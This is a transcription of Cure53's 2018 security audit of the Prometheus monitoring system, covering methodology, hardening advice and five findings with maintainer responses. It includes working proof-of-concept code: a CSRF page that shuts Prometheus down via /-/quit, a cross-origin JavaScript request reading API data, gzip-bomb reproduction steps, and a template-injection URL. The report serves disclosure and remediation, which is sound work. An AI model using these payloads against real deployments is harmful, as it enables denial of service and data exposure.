Pentest-Report Prometheus 05.-06.2018 - Cure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, BSc. J. Hector, Dipl.-Ing. A. Inführ, J. Larsson

Page created by April Palmer

IT & Technique

English

Like
Share
Embed
Fullscreen
Slides
Download HTML
Download PDF
Abuse

←

→

Page content transcription

If your browser does not render page correctly, please read the page content below

Dr.-Ing. Mario Heiderich, Cure53
                                                                     Bielefelder Str. 14
                                                                     D 10709 Berlin
                                                                     cure53.de · mario@cure53.de

Pentest-Report Prometheus 05.-06.2018
Cure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, BSc. J. Hector,
Dipl.-Ing. A. Inführ, J. Larsson

Index
   Introduction
   Scope
   Test Methodology
       Part 1 (Manual Code Auditing)
       Part 2 (Code-Assisted Penetration Testing)
   Hardening Recommendations
       General Security Recommendations
       HTTP Security Headers
       Content Security Policy & Beyond
       Authentication / Authorization
       Non-Idempotent Request Protection
       Transport Security
       Clients/metrics endpoint
       API Endpoint
       Admin GUI
   Identified Vulnerabilities
       PRM-01-001 Web: Prometheus lifecycle killed with CSRF (Medium)
       PRM-01-003 Web: CORS header exposes API data to all origins (High)
       PRM-01-005 Server: Clients can cause Denial of Service via Gzip Bomb (Medium)
   Miscellaneous Issues
       PRM-01-002 Client: Clients leak Metrics data through unprotected endpoint (Low)
       PRM-01-004 Web: Parameters used insecurely in HTML templates (Low)
   Conclusions

 Cure53, Berlin · 06/11/18                                                                     1/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

Introduction
“An open-source monitoring system with a dimensional data model, flexible query
language, efficient time series database and modern alerting approach.”

From https://prometheus.io/

This report documents the findings of a security assessment targeting the Prometheus
software compound and carried out by Cure53 in 2018. It should be noted that the
project was sponsored by The Linux Foundation / Cloud Native Computing Foundation.

In terms of the scope, the assignment entailed two main components as the Prometheus
project was investigated through both a dedicated source code audit and comprehensive
penetration testing. Following a brief, various items were included in the scope and a
detailed information on this matter can be found in the next Scope section. It should be
noted that a kick-off meeting with the in-house Prometheus team and the Cure53 testers
resulted in a shared document on the scope. This facilitated a clear delineation of the
envisioned focus and coverage.

Moving on to the resources and approaches, a team of six Cure53 testers was
comprised and allocated a total of eighteen days for the completion of the project. The
duration of the assessment was determined by a fixed budget provisioned by The Linux
Foundation/ Cloud Native Computing Foundation. White-box methodology has been
chosen as the best-fitting approach for this test and audit. Consequently, Cure53 had
access to the sources and all relevant technical information. What is more, under the
white-box premise, the testers and the in-house team at Prometheus maintained close
contact via Slack throughout this collaboration.

The tests proceeded on schedule and took place in late May and early June of 2018.
After spending the allocated eighteen days, the Cure53 believed to have reached a good
coverage of the agreed upon scope. As already noted, status updates were furnished to
the maintainers, yet no live-reporting of the findings was requested. Over the course of
the project, all communications were prompt and productive. Due to an excellent
preparatory phase, not many questions arose during the test. A clearly communicated
codebase and threat model were easy to understand and investigate for the Cure53
testers. At the same time, it was very much noticeable that said threat model that the
Prometheus team works with is quite unique. Specifically, Cure53 considers it rather
detached from what is usually found on web- and server-software in a similar category of
products.

Cure53, Berlin · 06/11/18 2/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

As for the findings, Cure53 discovered five security-relevant issues. Three were
categorized as actual vulnerabilities and two were classed as general weaknesses.
Among the discoveries in the realm of vulnerabilities, one was considered to be of a
“High” severity, as it related to a faulty and overly lax CORS configuration. The remaining
two flaws were assigned a risk-level of “Medium”. However, after several discussions
between Cure53 and the Prometheus team, several of the spotted issues were
ultimately flagged as “false alerts”. The maintainers argued that certain defenses,
considered by Cure53 as needed, were in fact not the responsibility of the Prometheus
project, but should rather be seen as tasks for other layers in the stack. Documentation
of the tickets affected by the discussions was accordingly updated to reflect these
changes.

In the following sections, the report first provides more details on the scope and points to
the code repositories that the Cure53 team relied on. Next, the documentation includes a
dedicated section on coverage, methodologies and general hardening
recommendations. A case-by-case discussion of findings then ensues. In the final
paragraphs of the Conclusion section, Cure53 shares some broader reflections about
the security posture of the Prometheus software compound. In addition, it addresses the
key issue of the unusual circumstance of this assessment, which led to an invalidation of
some discoveries. A general verdict taking the latter into account is offered at the end of
this report.

Scope
• Prometheus Clients
◦ Go Code-Base (audited with highest priority)
▪ https://github.com/prometheus/client_golang
▪ https://github.com/prometheus/client_golang/blob/master/prometheus/promhttp/h
ttp.go
◦ Python Code-Base (audited with lower priority)
▪ https://github.com/prometheus/client_python/
▪ https://github.com/prometheus/client_python/tree/master/prometheus_client
◦ Java Code-Base (audited with lowest priority)
▪ https://github.com/prometheus/client_java
• Prometheus Server
◦ https://github.com/prometheus/prometheus

Cure53, Berlin · 06/11/18 3/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

Methodology
The following section describes the methodology that was used during this source code
audit and penetration tests. The test was divided into two phases with corresponding
two-fold goals and focal points with reference to the scope. The first phase concentrated
mostly on manual source code reviews. These reviews aimed at spotting insecure code
constructs marked by the potential a capacity of leading to memory corruption,
information leakages and other similar flaws. The second phase of the test was
dedicated to classic penetration tests. During this phase, it was examined whether the
security promises made by Prometheus in fact hold against real-life attack situations.

Part 1 (Manual Code Auditing)
A list of items below seeks to detail some of the noteworthy steps undertaken during the
first part of the test, which entailed the manual code audit against the sources of the
Prometheus software compound. This list attests that in spite of the relatively low
number of findings, substantial efforts were made and a great deal of attention was
given to the scope. In other words, a good level of coverage was achieved with a lot of
dedication. The steps taken and completed during the assessment are listed next.

• The source code of the Prometheus server was checked for potential sinks via
data parsing. As the application avoids the use of potentially insecure formats like
XML, no issues were discovered.
• The logic of the retrieval component relies on the standard HTTP Go client. As
this client exclusively supports standard protocols like HTTP/HTTPS, no issues
were uncovered directly in the code. It was discovered that the gzip compression
is supported and this was later confirmed in Part 2 of the assessment.
• The admin interface exposes multiple HTTP routes. The case of user-controlled
data being processed was thus investigated. The aim was to verify if a potentially
insecure function call could be reached. A possible path traversal had been
discovered but was ultimately dismissed in the second part of the assessment.
• It was also discovered that templates can become prone to HTML encoding
issues possibly resulting in XSS. This could theoretically occur if the safeHtml
keyword is insecurely used but, in practice, no exploitable issue was unveiled.
• PromQL was also audited with the help of grammar that the lexer accepts.
Additionally, the provided fuzz-data was inspected and used for pitfall-testing and
atypical parsing where the lexer could perhaps break.
• The above approaches were applied to PromDB and its gRPC API where the
exposed endpoints could result in server-side security issues, such as
unrecoverable DOS conditions and general weaknesses undermining either the
availability or safety of Prometheus.

Cure53, Berlin · 06/11/18 4/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

• To cover more of the attack surface pertinent to the client-side of the architecture,
promtool was audited as well. The mindset here was that malicious responses
from an attacker-controlled server could result in a client-side compromise.

Part 2 (Code-Assisted Penetration Testing)
A list of items below distinguishes some of the noteworthy steps undertaken during the
second part of the test. This component encompassed code-assisted penetration testing
against the Prometheus software in scope. Given that the manual source code audit did
not yield an overly large amount of findings, the second step was chosen as an
additional measure for maximizing the test coverage. As for the specific steps executed
to enrich this phase, one can consult the enumeration and discussions offered in the
bullet points below.

• The web interface was enabled to verify the used HTML templating system. It
was demonstrated that it is properly encoding user-controlled data displayed in
the GUI.
• Additionally it was verified if the web GUI is properly encoding JSON and error
HTTP responses. As the web application employs X-Content-Type-Options:
nosniff, no issue was discovered.
• The supported protocols of the retrieval component were tested by redirecting to
potentially insecure protocol handlers like file:///.
• During Part 1 of the assessment, the gzip support of the retrieval component was
discovered. It was demonstrated that the Prometheus server is vulnerable to a
gzip compression bomb as described in PRM-01-005.
• The potential path traversal discovered in the code audit was tested for its
exploitability. It was discovered that as soon as the potential vulnerable paths
contain /../, the web server normalizes the path and therefore makes the
vulnerability unexploitable.
• It was also checked what impact the general lack of authentication and CSRF
protection would have. This was summarized in PRM-01-001 where simple
requests can practically lead to a Denial-of-Service conditions.
• During the assessment of the gRPC API, small issues like the snapshotting
features were checked. It was evaluated whether this would lead to a quick
consumption of the Docker’s filesystem space. Since all the cleanup routines are
easy to reach, this was discarded as a non-issue.

Cure53, Berlin · 06/11/18 5/18

Dr.-Ing. Mario Heiderich, Cure53
                                                                       Bielefelder Str. 14
                                                                       D 10709 Berlin
                                                                       cure53.de · mario@cure53.de

Hardening Recommendations
      The challenge of this assessment was a rather atypical and lightweight security model
      adopted by Prometheus. Specifically, it is a non-standard and simple model, which was
      chosen as means to placing the main focus on features and performance first, instead of
      being forced to enter the “security arms race”. In other words, the Prometheus
      compound factually remains somewhat outside of the climate faced by many complex
      applications, which constantly fight current and emergent threats. In finding a balance
      and compromise between listing flaws causing debates around relevance, it was
      decided in a debriefing with the maintainers that the Cure53 team should add a
      dedicated section on hardening recommendations and secure default approaches.

      This section will now list several recommended avenues and strategies. The
      Prometheus team may either decide for implementation or at least incorporate stronger
      documentation in order to increase the overall security level of the application without
      adding too much implementation effort.

General Security Recommendations
      Currently the approach deployed by Prometheus is to rely on a perimeter security rather
      than to implement security on an in-depth level. While this is an understandable
      approach that allows for more feature-focused and performance-friendly development, it
      is recommended to eventually switch to a different strategy for security-related reasons.

      The risks Cure53 sees going forward involve the complications in configuration and
      maintenance for the future developers. This may have severe implications for setting up
      a Prometheus instance and, in addition, can make the deployment model characterized
      by having a single point of failure. If the system is not properly isolated away, any attack
      bypassing the perimeter security will not be dramatically hindered in impact by
      Prometheus and not accepting any security responsibility here might not be the ideal
      path for the project.

      Cure53 understands that adding in-depth security to the software directly instead of
      relying on other layers in the stack to take care of this realm is likely going to slow down
      and complicate the development. If it is decided for the current approach to be followed
      in a long-run, it is recommended to at least thoroughly improve the documentation and
      make developers and administrators aware of how security is understood by the
      maintainers of the Prometheus software compound. In that context, the available
      guidelines must provide proper recommendations on how to actually set up the stack
      around Prometheus in a secure and robust way.

Cure53, Berlin · 06/11/18                                                                        6/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

HTTP Security Headers
It was noticed that Prometheus fails to make use of common HTTP security headers.
This allows for a large array of attacks involving browsers. At the same time, it can easily
be tackled by simply adding the headers and, as a consequence, a lot of security
properties would be gained without losing any performance. Similarly, the complexity
would not grow significantly. The recommended headers are as follows:

• X-Frame-Options: This header specifies whether the web page is allowed to be
framed. Although this header is known to prevent Clickjacking attacks, there are
many other attacks which can be achieved when a web page is framable 1. It is
recommended to set the value to either SAMEORIGIN or DENY.
• X-Content-Type-Options: This header determines whether the browser should
perform MIME Sniffing on the resource. The most common attack abusing the
lack of this header is tricking the browser to render a resource as a HTML
document, effectively leading to Cross-Site-Scripting (XSS).
• X-XSS-Protection: This header specifies if the browser’s built-in XSS auditors
should be activated (enabled by default). Not only does setting this header
prevent Reflected XSS, but also helps to avoid the attacks abusing the issues on
the XSS auditor itself with false-positives, e.g. Universal XSS 2 and similar. It is
recommended to set the value to either 0 (which is not recommended but better
than the default) or 1; mode=block.
• Strict-Transport-Security: Without the HSTS header, a MitM could attempt to
perform channel downgrade attacks using readily available tools such as
sslstrip3. In this scenario the attacker would proxy clear-text traffic to the victim-
user and establish an SSL connection with the targeted website, stripping all
cookie security flags if needed. It is recommended to set up the header as
follows: Strict-Transport-Security: max-age=31536000; includeSubDomains. Note
that the HSTS preload flag has been left out as it is considered dangerous4.

Content Security Policy & Beyond
The Prometheus Web UIs comprise perfect applications for the deployment of modern
web security features. Some of their key traits is that they do not make use of external
scripts, do not embed advertising or any other third-party scripts that usually make it
harder to deploy CSP and other advanced, modern web security features. While the
tests conducted by Cure53 did not identify any XSS issues to be present, it still makes
sense to add an additional layer of security. Despite the fact that presently the templating
1
https://cure53.de/xfo-clickjacking.pdf
2
http://www.slideshare.net/masatokinugawa/xxn-en
3
https://moxie.org/software/sslstrip/
4
https://www.tunetheweb.com/blog/dangerous-web-security-features/

Cure53, Berlin · 06/11/18 7/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

engine apparently works as expected and auto-escapes all externally-controlled content,
if an injection is ever there, a proper CSP would make it unlikely for the XSS attack to be
the result of a flaw.

Given the self-contained nature of the tested web UIs, the implementation of proper CSP
headers should not be a problem at all and is not likely to cause compatibility issues of
any kind. This means that adding CSP would actually raise the security bar significantly
for a comparably low implementation price.

Authentication / Authorization
It was noticed that several parts if the software do not require any authentication or
credentials when it comes to access and use. This holds, for example, for the Admin UI
whereon simply no form of login or credential check exists. The assumption is that the
Admin UI will only be reached from areas that are secured properly anyway. This follows
the security model that was described earlier and above.

However, it is nevertheless recommended to at least give developers or administrators
the possibility of adding simple HTTP Basic Authentication. This would again help to
makes sure that in case of a breach in the surrounding stack, another basic level of
security would keep the worst from happening. It is not that improbable to imagine that
an attacker could gain illegitimate access to the UI, so avoiding potential consequences
should be seen as rather important. While not enabling proper access control or even
ACL/RBAC, the proposed change should be easy to implement and at least provides
another barrier that a successful attacker would be required to overcome.

Non-Idempotent Request Protection
In its current state, the majority of Web-based UI used by Prometheus does not
implement any form of CSRF protection. It thus allows an attacker, as long as s/he
manages to lure an admin onto a specially crafted website, to fire pretty much arbitrary
requests to the backend and have them be accepted. This can only go well if the
assumption is met that the admin using the Prometheus’ UIs does not at all navigate to
other websites with the same browser.

It is strongly recommended to implement at least a simple CSRF protection and make
sure that non-idempotent requests cannot be sent (and then be processed) from any
arbitrary origin without using safe HTTP methods or without using a secret token. Note
that methods GET and POST are not considered safe and should be replaced with the
matching HTTP verb. Taking the case illustrated in PRM-01-001 as an indicator, the
adequate method would be DELETE instead of POST. Using the appropriate HTTP
request methods adds a first and simple layer of security. Extending the protective

Cure53, Berlin · 06/11/18 8/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

system to add a CSRF token would round the protection up by preventing a vast range
of possible attacks. A CSRF token could be constructed as follows:

# = separator character
nonce = random value
secret = sha256(userid + sessionid)
CSRF-Token = base64(nonce#hmac-sha256(nonce, secret))

This revised proposal permits an easy replacement of the current implementation and
requires no additional states on the server-side. Moreover, it alleviates the risks linked to
the use of arbitrary tokens from different user-sessions.

Alternatively, it could be considered to solve the CSRF problem with a static token that
can be communicated to external tools like cURL or alike. This would ascertain that
those can still request and receive data as expected. Implementing an API endpoint that
offers the dynamic token to cURL and alike before sending the actual requests is a good
option as well.

A similar issue was spotted in connection with the implementation of Prometheus’ CORS
settings. At the current stage, there is no way to configure the CORS headers in a way
that does not allow arbitrary domains to send requests and read the response. This
again forces the users and administrators of Prometheus to only make use of the web
UIs in environments where CSRF is pretty much impossible to achieve. It is
recommended to give the administrator a choice via configuration or plugin and choose
one of the following:

a) Allow the very tolerant settings;
b) Allow only same domain requests to succeed;
c) Grant an ability to specify a whitelist of domain names that are allowed to send
requests and read their responses for further processing.

Transport Security
It was noticed that SSL/TLS is not set up to be the default protocol on the Prometheus
UI. This is another feature that makes sense if the Prometheus system is deployed in an
environment where security is being taken care of by the different layers of the stack.
However, since this can never be guaranteed, it is recommended to make HTTPS
become the default. Either tools or documentation should be furnished to admins and
developers so that they can easily set up encrypted communications using Let’s Encrypt5
or self-signed certificates. This could help secure the communications in the internal
network or any other location hosting the Prometheus instances and UIs.
5
https://letsencrypt.org/docs/

Cure53, Berlin · 06/11/18 9/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

Identified Vulnerabilities
The following sections list both vulnerabilities and implementation issues spotted during
the testing period. Note that findings are listed in a chronological order rather than by
their degree of severity and impact. The aforementioned severity rank is simply given in
brackets following the title heading for each vulnerability. Each vulnerability is
additionally given a unique identifier (e.g. PRM-01-001) for the purpose of facilitating any
future follow-up correspondence.

PRM-01-001 Web: Prometheus lifecycle killed with CSRF (Medium)
While issues like Cross-Site Request Forgery (CSRF) were initially determined to be
mostly out-of-scope for the Prometheus web application, it is hard to argue against the
importance of scenarios where the direct availability of Prometheus is in jeopardy. In this
context, it is possible so simply turn off Prometheus (assuming the lifecycle feature
enabled) by sending a local or remote administrator with access to its web server
instances to a specially crafted website. Here, a CSRF payload can be fired to
automatically close the Prometheus’ life cycle. The issue was noticed in the following
lines of the application’s source code.

Affected File:
prometheus/prometheus/web/web.go

Affected Code:
if o.EnableLifecycle {
router.Post("/-/quit", h.quit)
router.Post("/-/reload", h.reload)
} else {
[...]
func (h *Handler) quit(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "Requesting termination... Goodbye!")
close(h.quitCh)
}

To demonstrate this issue, a small HTML page furnished below will send a POST
request to http://prometheus.instance:9090/-/quit. This triggers an exit and makes
Prometheus unavailable for further actions.

PoC.html:

function submitRequest()
{

Cure53, Berlin · 06/11/18 10/18

Dr.-Ing. Mario Heiderich, Cure53
                                                               Bielefelder Str. 14
                                                               D 10709 Berlin
                                                               cure53.de · mario@cure53.de

               var xhr = new XMLHttpRequest();
               xhr.open("POST", "http:\/\/localhost:9090\/-\/quit", true);
               xhr.setRequestHeader("Accept",
       "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
               xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
               xhr.setRequestHeader("Content-Type", "application\/x-www-form-
       urlencoded");
               xhr.withCredentials = true;
               var body = "x";
               var aBody = new Uint8Array(body.length);
               for (var i = 0; i < aBody.length; i++)
                 aBody[i] = body.charCodeAt(i);
               xhr.send(new Blob([aBody]));
             }
           
       Log Output on Visit:
       level=warn ts=2018-05-28T07:56:47.880789453Z caller=main.go:378 msg="Received
       termination request via web service, exiting gracefully..."
       level=info ts=2018-05-28T07:56:47.880817909Z caller=main.go:398 msg="Stopping
       scrape discovery manager..."
       level=info ts=2018-05-28T07:56:47.880825099Z caller=main.go:411 msg="Stopping
       notify discovery manager..."
       level=info ts=2018-05-28T07:56:47.880829691Z caller=main.go:432 msg="Stopping
       scrape manager..."
       level=info ts=2018-05-28T07:56:47.880837746Z caller=main.go:394 msg="Scrape
       discovery manager stopped"
       level=info ts=2018-05-28T07:56:47.880847876Z caller=main.go:407 msg="Notify
       discovery manager stopped"
       level=info ts=2018-05-28T07:56:47.880930313Z caller=main.go:426 msg="Scrape
       manager stopped"
       level=info ts=2018-05-28T07:56:47.88499109Z caller=manager.go:460
       component="rule manager" msg="Stopping rule manager..."
       level=info ts=2018-05-28T07:56:47.885017853Z caller=manager.go:466
       component="rule manager" msg="Rule manager stopped"
       level=info ts=2018-05-28T07:56:47.885040973Z caller=notifier.go:512
       component=notifier msg="Stopping notification manager..."
       level=info ts=2018-05-28T07:56:47.885050203Z caller=main.go:573 msg="Notifier
       manager stopped"
       level=info ts=2018-05-28T07:56:47.885163015Z caller=main.go:584 msg="See you
       next time!"

Cure53, Berlin · 06/11/18                                                               11/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

While it is clear that Prometheus deliberately omits standard protection mechanisms like
anti-forgery tokens, this practice cannot be condoned. It is hard to reason against them
when a vulnerability like the one described here can be outlined. In fact, every route that
is exposed when the admin interface is available appears to be vulnerable to simple
CSRF as well. Even with the existence of a reverse-proxy, set to cover the lack of any
valid authentication mechanism, disregarding CSRF tokens is strange. Therefore, it is
highly recommended to implement basic anti-forgery mechanisms, for example by
utilizing gorilla/csrf6.

Note: This was flagged as a false alert and an expected behavior by the Prometheus
team.

PRM-01-003 Web: CORS header exposes API data to all origins (High)
The Prometheus API endpoints have Cross-Origin Resource Sharing 7 (CORS) enabled.
By setting CORS headers it is possible to weaken the Same-Origin Policy 8 of the
browser and expose the API resources to other web origins. It was discovered that this
configuration is used insecurely, as it exposes the endpoints to all web origins. The
current setup where “*” means “any origin” is as follows:

Access-Control-Allow-Origin: *

This deployment means that any website can use the JavaScript PoC listed below to
read any data exposed by the Prometheus API. This can be done by using
XMLHttpRequest or fetch(). The provided Proof-of-Concept utilizes the go_info query to
display the currently defined clients of the Prometheus application. Note that any other
query type can be used as well and would accomplish the same result.

JavaScript PoC:

x = new XMLHttpRequest();
x.open("GET","http://demo.do.prometheus.io:9090/api/v1/query?
query=go_info&time=1527264495.82&_=1527264125057",false)
x.send()
console.log(x.responseText)

Triggered HTTP Request:
GET http://demo.do.prometheus.io:9090/api/v1/query?
query=go_info&time=1527264495.82&_=1527264125057 HTTP/1.1
6
https://github.com/gorilla/csrf
7
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
8
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy

Cure53, Berlin · 06/11/18 12/18

Dr.-Ing. Mario Heiderich, Cure53
                                                                          Bielefelder Str. 14
                                                                          D 10709 Berlin
                                                                          cure53.de · mario@cure53.de

          Referer: http://example.com
          Origin: http://example.com
          Host: demo.do.prometheus.io:9090

          HTTP Response:
          HTTP/1.1 200 OK
          Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Origin
          Access-Control-Allow-Methods: GET, OPTIONS
          Access-Control-Allow-Origin: *

          {"status":"success","data":{"resultType":"vector","result":[{"metric":
          {"__name__":"go_info","env":"demo","instance":"demo.do.prometheus.io:3000","job"
          :"grafana","version":"go1.10"},"value":[1527264495.819,"1"]},{"metric":
          {"__name__":"go_info","env":"demo","instance":"demo.do.prometheus.io:9100","job"
          :"node","version":"go1.9.2"},"value":[1527264495.819,"1"]},{"metric":
          {"__name__":"go_info","instance":"influx.cloudalchemy.org:8086","job":"influxdb"
          ,"version":"go1.9.2"},"value":[1527264495.819,"1"]}]}}

          It is recommended to re-evaluate the need of exposing the Prometheus API via Cross-
          Origin Resource Sharing. In case this feature is necessary and therefore cannot be
          removed, it is recommended to define the domains which are allowed to access the
          admin API via the Access-Control-Allow-Origin:  header. One implementation of
          this feature could be to a requirement for a Prometheus user to define these domains via
          the configuration file

          Note: This was flagged as a false alert and an expected behavior by the Prometheus
          team.

PRM-01-005 Server: Clients can cause Denial of Service via Gzip Bomb (Medium)
          The retrieval component of the Prometheus server application retrieves metrics from
          clients via the HTTP protocol in order to pass it to the internal parser. It was discovered
          that the retrieval component supports HTTP gzip compression9 for client HTTP
          responses. This feature can be abused by a rogue client to cause a Denial of Service on
          the Prometheus server by crafting a response which will consume all memory once
          decompressed.

          After receiving a client response, the Prometheus server application checks if the HTTP
          response contains a Content-Encoding: gzip header. Afterwards the response body is
          passed to gzip.NewReader to be able to properly decompress the payload afterwards.
          As soon as the application is passing the gzip reader to io.Copy, the payload is actually
          deflated. To cause a memory exhaustion, an 18MB gzip-compressed response was
          created and it inflated to 18GB in memory.
9
    https://en.wikipedia.org/wiki/HTTP_compression

Cure53, Berlin · 06/11/18                                                                          13/18

Dr.-Ing. Mario Heiderich, Cure53
                                                                   Bielefelder Str. 14
                                                                   D 10709 Berlin
                                                                   cure53.de · mario@cure53.de

       File:
       prometheus/scrape/scrape.go

       Code:
       if resp.Header.Get("Content-Encoding") != "gzip" {
              _, err = io.Copy(w, resp.Body)
              return err
       }
       if s.gzipr == nil {
              s.buf = bufio.NewReader(resp.Body)
              s.gzipr, err = gzip.NewReader(s.buf)
              if err != nil {
              return err
              }
       } else {
       [...]
       }
       // Memory exhaustion
       _, err = io.Copy(w, s.gzipr)

       Steps to reproduce:
          • Place bomb.php and bomb.gz in the root of your local web server.
          • Start the Prometheus application with the configuration below.
          • After 15 seconds the Prometheus server will fetch http://127.0.0.1/bomb.php and
              starts decompressing.
          • Prometheus will stop with the following error:
              fatal error: runtime: out of memory

               runtime stack:
               runtime.throw(0x1af802b, 0x16)
               /usr/local/go/src/runtime/panic.go:616 +0x81

       Prometheus Config:
       global:
              scrape_interval:        15s

               external_labels:
               monitor: 'codelab-monitor'

       scrape_configs:
              - job_name: 'prometheus'
              metrics_path: '/bomb.php'

Cure53, Berlin · 06/11/18                                                                   14/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

static_configs:
- targets: ['127.0.0.1:80']
labels:
group: 'canary'

File:
Bomb.php (download here)

Code:

Compression bombs are fairly difficult to prevent without influencing the usability of the
software. Given that the Prometheus server needs to be configured to gather metrics
from a malicious target, this risk could be accepted. Nevertheless it could be taken into
consideration to use io.CopyN10 instead of io.Copy as the former allows specifying the
amount of bytes which should be read from the gzip stream. By defining a proper limit, it
is possible to ensure that the decompressed buffer cannot cause a memory exhaustion.

Miscellaneous Issues
This section covers those noteworthy findings that did not lead to an exploit but might aid
an attacker in achieving their malicious goals in the future. Most of these results are
vulnerable code snippets that did not provide an easy way to be called. Conclusively,
while a vulnerability is present, an exploit might not always be possible.

PRM-01-002 Client: Clients leak Metrics data through unprotected endpoint (Low)
Metric data are to be collected for some services and these items need to implement a
client-library that enables the core Prometheus service to scrape the data. The client-
library opens a minimal HTTP server and exposes a route which is then registered with
the core service for scraping. This endpoint is unauthenticated by default, which allows
anybody who knows the URI to read the metric data. It is recommended to put some
form of authentication in place. Only the core Prometheus service should be allowed to
read the metric data.

Note: This was flagged as a false alert and an expected behavior by the Prometheus
team.

10
https://golang.org/pkg/io/#CopyN

Cure53, Berlin · 06/11/18 15/18

Dr.-Ing. Mario Heiderich, Cure53
                                                                      Bielefelder Str. 14
                                                                      D 10709 Berlin
                                                                      cure53.de · mario@cure53.de

PRM-01-004 Web: Parameters used insecurely in HTML templates (Low)
       The Prometheus admin web interface utilizes HTML templates for its GUI. The templates
       are rendered on the server-side to be able to include certain information the user is
       requesting. It was discovered that user-controlled GET parameters end up in the GUI
       template before it is completely parsed. This allows an attacker to inject a single quote
       character which breaks the structure of the defined query structure, thus causing an
       HTTP 500 error.

       Notably, during the test it was not possible to cause this error via the double quote
       characters, indicating that an attacker can influence the query structure but not the
       overall structure of the template.

       Example URL:
       http://demo.do.prometheus.io:9090/consoles/node-overview.html?instance=test%27aaa

       Server Response:
       error executing template __console_/node-overview.html: template:
       __console_/node-overview.html:13:103: executing "__console_/node-overview.html"
       at : error calling query: parse error at char 57: missing comma before
       next identifier "aaa"

       Affected File:
       prometheus/consoles/node-overview.html

       Code:
       
       new PromConsole.Graph({
       node: document.querySelector("#cpuGraph"),
       expr: "sum by (mode)(irate(node_cpu{job='node',instance='{{
       .Params.instance }}',mode!='idle'}[5m]))",
       renderer: 'area',
       max: {{ with printf "count(count by (cpu)
       (node_cpu{job='node',instance='%s'}))" .Params.instance | query }}{{ . | first |
       value }}{{ else}}undefined{{end}},

       It is recommended to check all instances where user-controlled parameters reach the
       query structures. The single quote character should be filtered to ensure an attacker is
       unable to influence the template structure on the server-side.

Cure53, Berlin · 06/11/18                                                                      16/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

Conclusions
The results of this Cure53 2018 assessment of the Prometheus software compound are
rather mixed. This stems from varying perspectives on security represented by the
maintainers of Prometheus vis-à-vis the Cure53 testing team. On the one hand, the
overall indicators were very good with low number of findings, strong and clearly-written
code and very well-chosen and properly-deployed security properties. On the other
hand, the testers are concerned with the general assumption about the removal of
security as the noteworthy realm by shifting this task to the outside layers and parties.
While the Prometheus compound has great potential from a technical standpoint, its
general security perspective might be overly optimistic and eventually called into
question by emerging risks.

To reiterate, this investigation of the Prometheus’ scope was generously funded by The
Linux Foundation/ Cloud Native Computing Foundation and the financing enabled a
creation of six-member Cure53 testing team. The auditors and penetration testers
investigated the scope over the course of eighteen days in May and June of 2018. While
they achieved what is believed to be a good coverage of the scope and uncovered a
number of security issues as well as dimensions in which hardening is warranted, many
aspects deemed as faulty were dismissed by the Prometheus team. The maintainers
requested numerous items to be flagged as “false alerts” and accepted the risk that the
problems may carry.

As already noted, a plethora of positive security indicators could be driven from the
secure and clean state of the code belonging to the Prometheus project. To give just one
example of the benefits of such praiseworthy code, one potential path traversal issue,
which was spotted in the admin GUI, was solely not exploitable because of the default
behavior of the GO language and the fact that the HTTP server normalizes any
requested path. Moreover, the assessment of the defined PromQL query language
demonstrated that all exposed keywords or functions seem to be implemented with
security in mind and no potentially insecure functions could be reached.

On the contrary, it can be seen from the tickets discussed above that nearly all findings
believed to be valid by Cure53 were flagged to be false alerts. This is because the
Prometheus team assumes that the system would only be deployed in already well
secured environments and, thusly, shifts the responsibility for security to other layers.
While this might be true for various scenarios, it is hard to accept that to be the norm by
default. In other words, it would be extremely difficult - if not impossible - to attain any
sort of guarantees that the approach taken by Prometheus is indeed safe. Under this
explicit premise of uncertainty, it was surprising for the test team to find out that there is

Cure53, Berlin · 06/11/18 17/18

Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de

no perceived need for stricter CORS settings, CSRF protection, HTTP security headers
or other mechanisms that allow hardening web applications.

After the majority of the tests have been finished, Cure53 invited the in-house team at
Prometheus for a debriefing meeting. The issue of “false alerts” was extensively
discussed and, in the end, Cure53 agreed to incorporate these “false alert” flags to the
findings. However, it was also considered pivotal for a dedicated section on hardening
recommendations to be included in the report. The latter has been accepted and can be
found in the documentation.

It is hoped that recommendations can be seen as prospective long-term ideas and
inspirations for making additions into the security landscape adopted by the Prometheus
compound. Regardless of very limited number of findings and an excellent state of
security found on the scope items at present, Cure53 advises the project maintainers to
make adjustment into the existing documentation and, possibly, follow some of the more
technically-demanding suggestions. All in all, clear and specific documentation is needed
to make sure that developers, admins and users of the Prometheus project are aware of
the fact that they must keep it secure on their end. At the very least, the website hosting
the Prometheus software should provide a manual stating the limitations of the system
across various security realms. Moreover, it is expected that guidelines on how to best
tackle any technical doubts or dilemmas can be supplied as well.

Cure53 would like to thank Brian Brazil, Ben Kochie, Richard Hartmann and Johannes
